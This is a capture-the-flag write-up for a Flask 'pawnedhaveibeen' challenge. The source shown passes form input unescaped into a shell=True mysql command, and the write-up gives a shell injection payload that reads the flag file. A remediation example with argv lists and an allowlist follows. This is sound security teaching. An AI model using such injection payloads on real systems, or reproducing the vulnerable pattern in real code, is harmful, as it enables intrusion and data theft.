pawnedhaveibeen
SRC: https://library.m0unt41n.ch/challenges/pawnedhaveibeen
The source is given: the POST form handler has a command injection through subprocess in Python (the user's input is interpolated into a command string that is run with shell=True).
Python:
    import os
    import subprocess
    from flask import Flask, render_template, request

    app = Flask(__name__)

    @app.route('/check', methods=['POST'])
    def check_pawn():
        username_or_email = request.form['username_or_email']
        mysql_username = os.environ.get('MYSQL_USERNAME')
        mysql_password = os.environ.get('MYSQL_PASSWORD')
        # User input goes straight into a shell command string; the single and
        # double quotes around it are what the payload breaks out of.
        command = f'mysql -u {mysql_username} -p{mysql_password} -D pawned -e "SELECT * FROM pwned_users WHERE pwned_user = \'{username_or_email}''\';"'
        try:
            # shell=True hands the string to /bin/sh; only stdout is ever shown to the user
            result = subprocess.run(command, shell=True, capture_output=True)
            if result.stdout:
                message = "Oh no — pwned! Your user " + result.stdout.decode('utf-8')[result.stdout.decode('utf-8').rfind('\t') + 1:] + " has been pawned. Please update all your passwords. Also, consider reading our <a href='/security-education'>security education page</a> for tips on improving your online security."
            else:
                message = "Good news — no pwnage found! Your user is not pawned. Keep up the good work on maintaining strong passwords. Also, consider reading our <a href='/security-education'>security education page</a> for tips on improving your online security."
            return render_template('index.html', result=message)
        except subprocess.CalledProcessError as e:
            # never raised here: run() only raises this when called with check=True
            return "Error executing SQL query"
We can basically just ignore the SQL query, so we first add -> "; to close the quoted argument and end the mysql command.
Then we can start off with an ls, and add a comment with a hashtag -> ls 2>&1; #
I started with a cat /filewhatever and didn't see any result, not even errors... That's because the script only shows stdout and not stderr. Therefore I added 2>&1 -> ls 2>&1; # like this, to also show potential errors (redirects stderr to stdout).
So the final payload for the flag: "; cat flag.txt 2>&1; #
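The fix for the handler above, as an added example that is not part of the challenge source or this writeup: build the mysql invocation as an argv list (shell=False) so the writeup's payload reaches the child process as one literal argument, and reject input outside a constructed allowlist, since mysql -e has no bound parameters to stop the SQL quote breakout. The allowlist regex and the default dbuser/dbpass credentials are assumptions.

```python
import re
import subprocess
import sys

# The writeup's final payload, reused here as constructed test input.
PAYLOAD = '"; cat flag.txt 2>&1; #'

# Constructed allowlist (an assumption, not from the challenge): a username
# or e-mail address never legitimately needs quotes, spaces, `;` or `#`,
# so anything outside this character set is rejected before any command.
VALID_LOOKUP = re.compile(r'^[A-Za-z0-9._@+-]{1,254}$')


def build_safe_argv(lookup, user='dbuser', password='dbpass'):
    """Build the mysql invocation as an argv list for subprocess.run(shell=False).

    Each list element reaches mysql as exactly one argument, so quotes, `;`
    and `#` in `lookup` are never parsed by a shell.  Because `mysql -e`
    offers no bound parameters, the allowlist check is what closes the
    remaining SQL quote breakout.
    """
    if not VALID_LOOKUP.match(lookup):
        raise ValueError('lookup value contains disallowed characters')
    query = f"SELECT * FROM pwned_users WHERE pwned_user = '{lookup}';"
    return ['mysql', '-u', user, f'-p{password}', '-D', 'pawned', '-e', query]


def argv_is_data(arg):
    """Show that shell=False passes `arg` through verbatim.

    Runs the current Python interpreter as the child (always present) and
    returns what the child saw in sys.argv[1].  Interpolated into a
    shell=True command string, the same text would end the mysql command
    and start a new one, which is exactly the bug in the challenge.
    """
    child = [sys.executable, '-c', 'import sys; print(sys.argv[1], end="")', arg]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    # capture_output collects stderr as well; keep it in server-side logs
    # instead of echoing command output to the user as the handler does.
    return result.stdout


if __name__ == '__main__':
    print(build_safe_argv('alice@example.com'))
    print(argv_is_data(PAYLOAD) == PAYLOAD)  # True: no shell, no injection
```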